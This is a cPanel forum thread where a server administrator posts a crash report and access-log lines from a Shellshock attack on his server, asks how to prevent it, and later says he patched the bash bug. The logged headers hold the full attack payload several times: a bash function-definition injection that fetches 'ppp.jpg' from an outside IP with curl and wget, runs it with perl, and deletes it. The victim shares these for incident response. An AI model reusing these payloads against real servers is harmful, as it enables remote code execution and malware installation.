The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Whm - Cpanel script security folder tmp.

Discussion in 'Security' started by Morri Luca, Apr 7, 2015.

  1. Morri Luca

    Morri Luca Member

    Joined:
    Mar 19, 2015
    Messages:
    8
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Italia
    cPanel Access Level:
    Root Administrator
    Hello. this morning my server is down and i received this email from my server :

    (XXXXX = my user server)

    Object : [abrt] full crash report
    Code:
    abrt_version:   2.0.8
    cmdline:        /bin/sh php4
    executable:     /bin/bash
    kernel:         2.6.32-220.13.1.el6.x86_64
    pid:            19131
    pwd:            /usr/local/cpanel/cgi-sys
    reason:         Process /bin/bash was killed by signal 11 (SIGSEGV)
    time:           Tue 07 Apr 2015 04:10:02 AM CEST
    uid:            507
    username:      XXXXXX
    
    sosreport.tar.xz: Binary file, 1777664 bytes
    
    environ:
    :PATH=/usr/local/bin:/usr/bin:/bin
    :HTTP_HOST=XXXXXX.COM
    :HTTP_CONNECTION=keep-alive
    :HTTP_CACHE_CONTROL=max-age=0
    :HTTP_USER_AGENT
    :'() { :;}; /bin/bash -c \"echo xxxxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"'
    :'HTTP_COOKIE=() { :;}; /bin/bash -c \"echo xxxxxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"'
    :'HTTP_REFERER=() { :;}; /bin/bash -c \"echo xxxxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"'
    :HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    :HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.8
    :SERVER_SIGNATURE=
    :'SERVER_SOFTWARE=Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4'
    :SERVER_NAME=xxxxxx.com
    :SERVER_ADDR=myip
    :SERVER_PORT=80
    :REMOTE_ADDR=62.149.164.193
    :DOCUMENT_ROOT=/home/xxxxxxx/public_html
    :SERVER_ADMIN=webmaster@xxxxxxx.com
    :SCRIPT_FILENAME=/usr/local/cpanel/cgi-sys/php4
    :REMOTE_PORT=51684
    :GATEWAY_INTERFACE=CGI/1.1
    :SERVER_PROTOCOL=HTTP/1.1
    :REQUEST_METHOD=GET
    :QUERY_STRING=
    :REQUEST_URI=/cgi-sys/php4
    :SCRIPT_NAME=/cgi-sys/php4
    
    limits:
    :Limit                     Soft Limit           Hard Limit           Units    
    :Max cpu time              unlimited            unlimited            seconds  
    :Max file size             unlimited            unlimited            bytes    
    :Max data size             unlimited            unlimited            bytes    
    :Max stack size            10485760             unlimited            bytes    
    :Max core file size        0                    unlimited            bytes    
    :Max resident set          unlimited            unlimited            bytes    
    :Max processes             62776                62776                processes
    :Max open files            16384                16384                files    
    :Max locked memory         65536                65536                bytes    
    :Max address space         unlimited            unlimited            bytes    
    :Max file locks            unlimited            unlimited            locks    
    :Max pending signals       62776                62776                signals  
    :Max msgqueue size         819200               819200               bytes    
    :Max nice priority         0                    0                   
    :Max realtime priority     0                    0                   
    :Max realtime timeout      unlimited            unlimited            us       
    
    maps:
    :00400000-004d4000 r-xp 00000000 fd:00 3407921                            /bin/bash
    :006d3000-006dd000 rw-p 000d3000 fd:00 3407921                            /bin/bash
    :006dd000-006e2000 rw-p 00000000 00:00 0
    :008dc000-008e5000 rw-p 000dc000 fd:00 3407921                            /bin/bash
    :0210e000-0212f000 rw-p 00000000 00:00 0                                  [heap]
    :333d800000-333d820000 r-xp 00000000 fd:00 655418                         /lib64/ld-2.12.so
    :333da1f000-333da20000 r--p 0001f000 fd:00 655418                         /lib64/ld-2.12.so
    :333da20000-333da21000 rw-p 00020000 fd:00 655418                         /lib64/ld-2.12.so
    :333da21000-333da22000 rw-p 00000000 00:00 0
    :333dc00000-333dd89000 r-xp 00000000 fd:00 655456                         /lib64/libc-2.12.so
    :333dd89000-333df88000 ---p 00189000 fd:00 655456                         /lib64/libc-2.12.so
    :333df88000-333df8c000 r--p 00188000 fd:00 655456                         /lib64/libc-2.12.so
    :333df8c000-333df8d000 rw-p 0018c000 fd:00 655456                         /lib64/libc-2.12.so
    :333df8d000-333df92000 rw-p 00000000 00:00 0
    :333e400000-333e402000 r-xp 00000000 fd:00 655645                         /lib64/libdl-2.12.so
    :333e402000-333e602000 ---p 00002000 fd:00 655645                         /lib64/libdl-2.12.so
    :333e602000-333e603000 r--p 00002000 fd:00 655645                         /lib64/libdl-2.12.so
    :333e603000-333e604000 rw-p 00003000 fd:00 655645                         /lib64/libdl-2.12.so
    :3340c00000-3340c1d000 r-xp 00000000 fd:00 655748                         /lib64/libtinfo.so.5.7
    :3340c1d000-3340e1d000 ---p 0001d000 fd:00 655748                         /lib64/libtinfo.so.5.7
    :3340e1d000-3340e21000 rw-p 0001d000 fd:00 655748                         /lib64/libtinfo.so.5.7
    :7fdfa080b000-7fdfa080e000 rw-p 00000000 00:00 0
    :7fdfa0820000-7fdfa0821000 rw-p 00000000 00:00 0
    :7fffc1456000-7fffc146b000 rw-p 00000000 00:00 0                          [stack]
    :7fffc1550000-7fffc1551000 r-xp 00000000 00:00 0                          [vdso]
    :ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
    
    open_fds:
    :0:pipe:[121610173]
    :pos:    0
    :flags:    00
    :1:pipe:[121610174]
    :pos:    0
    :flags:    01
    :2:pipe:[121610175]
    :pos:    0
    :flags:    01
    
    After i had restar server and into file /home/xxxx/access-logs/xxxxx.com i found this Request
    Code:
    62.149.164.193 - - [07/Apr/2015:04:08:07 +0200] "GET /cgi-sys/php4 HTTP/1.1" 500 - "() { :;}; /bin/bash -c \"echo xxxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"" "() { :;}; /bin/bash -c \"echo xxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\""
    62.149.164.193 - - [07/Apr/2015:04:07:43 +0200] "GET /cgi-bin/test-cgi HTTP/1.1" 500 - "() { :;}; /bin/bash -c \"echo xxxxxx.COM/cgi-bin/test-cgi ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/cgi-bin/test-cgi ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"" "() { :;}; /bin/bash -c \"echo xxxxx.COM/cgi-bin/test-cgi ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/cgi-bin/test-cgi ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\""
    62.149.164.193 - - [07/Apr/2015:04:07:19 +0200] "GET /phppath/cgi_wrapper? HTTP/1.1" 500 - "() { :;}; /bin/bash -c \"echo xxxxx.COM/phppath/cgi_wrapper? ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/phppath/cgi_wrapper? ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"" "() { :;}; /bin/bash -c \"echo xxxxx.COM/phppath/cgi_wrapper? ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/phppath/cgi_wrapper? ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\""
    Then i fount file ppp.jpg into my tmp folder.
    I removed all.
    Do I prevent this malware? How can i do? Thank
     
  2. Morri Luca

    Morri Luca Member

    Joined:
    Mar 19, 2015
    Messages:
    8
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Italia
    cPanel Access Level:
    Root Administrator
    Hello. I find the problem. This attack is call Shellshock.

    I solved the problem and fix the system Bug.

    ausweb.com.au/tutorials/2014/09/26/check-linux-server-vulnerable-shellshock/
     
    #2 Morri Luca, Apr 8, 2015
    Last edited by a moderator: Apr 8, 2015
Loading...

Share This Page